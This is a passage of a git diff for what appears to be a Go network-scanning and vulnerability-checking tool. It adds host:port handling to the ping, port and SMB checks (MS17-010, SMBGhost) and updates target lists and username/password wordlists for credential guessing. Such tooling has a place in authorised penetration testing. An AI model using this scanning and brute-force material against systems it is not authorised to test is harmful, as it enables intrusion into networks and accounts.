+		passdic = Readiness(passive)
+	}
+	return userdic, passdic
+}
diff --git a/cmd/icmp.go b/cmd/icmp.go
index eac0410..c734578 100644
--- a/cmd/icmp.go
+++ b/cmd/icmp.go
@@ -47,13 +47,25 @@ func execute(ips []string, r bool) []string {
 	var wg sync.WaitGroup
 	// 修改ants池的并发方式
 	p, _ := ants.NewPoolWithFunc(len(ips), func(ip interface{}) {
+		var ipt string
 		if r == true {
-			if icmp(ip.(string)) {
+			// 127.0.0.1:8080格式
+			if strings.Contains(ip.(string), ":") {
+				ipt = strings.Split(ip.(string), ":")[0]
+			} else {
+				ipt = ip.(string)
+			}
+			if icmp(ipt) {
 				Println(fmt.Sprintf("[+] Find %v (icmp)", ip))
 				Alive = append(Alive, ip.(string))
 			}
 		} else {
-			if ping(ip.(string)) {
+			if strings.Contains(ip.(string), ":") {
+				ipt = strings.Split(ip.(string), ":")[0]
+			} else {
+				ipt = ip.(string)
+			}
+			if ping(ipt) {
 				Println(fmt.Sprintf("[+] Find %v (ping)", ip))
 				Alive = append(Alive, ip.(string))
 			}
diff --git a/cmd/ps.go b/cmd/ps.go
index cdf246d..bb2b8c8 100644
--- a/cmd/ps.go
+++ b/cmd/ps.go
@@ -6,6 +6,8 @@ import (
 	"github.com/spf13/cobra"
 	"math"
 	"net"
+	"strconv"
+	"strings"
 	"sync"
 	"time"
 )
@@ -74,8 +76,17 @@ func PortScan(host []string, ports []int) []PortResult {
 		})
 	})
 	for _, ip := range host {
-		wg.Add(1)
-		_ = p.Invoke(ip)
+		if strings.Contains(ip, ":") {
+			addr := strings.Split(ip, ":")[0]
+			port, _ := strconv.Atoi(strings.Split(ip, ":")[1])
+			if portConn(addr, port) {
+				Println(fmt.Sprintf("[+] %v %v open", addr, port))
+				tempPort = append(tempPort, PortResult{addr, []int{port}})
+			}
+		} else {
+			wg.Add(1)
+			_ = p.Invoke(ip)
+		}
 	}
 	wg.Wait()
 	return tempPort
diff --git a/cmd/vuln.go b/cmd/vuln.go
index 334c8d9..be8bd5d 100644
--- a/cmd/vuln.go
+++ b/cmd/vuln.go
@@ -5,6 +5,7 @@ import (
 	"fmt"
 	"github.com/panjf2000/ants/v2"
 	"github.com/spf13/cobra"
+	"strings"
 	"sync"
 )
 
@@ -67,6 +68,9 @@ func VulScan(ips []string, ms17010bool bool, allbool bool, smbGohstbool bool) {
 	})
 
 	for _, ip := range ips {
+		if strings.Contains(ip, ":") && !strings.Contains(ip, ":445") {
+			continue
+		}
 		wg.Add(1)
 		_ = p.Invoke(ip)
 	}
diff --git a/ips.txt b/ips.txt
index 850cd61..881c59d 100644
--- a/ips.txt
+++ b/ips.txt
@@ -2,3 +2,6 @@
 192.168.248.219
 192.168.248.212
 192.168.248.128
+127.0.0.1:445
+127.0.0.1:5985
+
diff --git a/pass.txt b/pass.txt
index 5d7cf4e..106214c 100644
--- a/pass.txt
+++ b/pass.txt
@@ -1,4 +1,4 @@
-123456
-P@ssw0rd
-930517
-kali
+123456
+P@ssw0rd
+930517
+kali
diff --git a/user.txt b/user.txt
index dafb523..651954d 100644
--- a/user.txt
+++ b/user.txt
@@ -1,5 +1,5 @@
-administrator
-Oadmin
-kali
-root
-
+administrator
+Oadmin
+kali
+root
+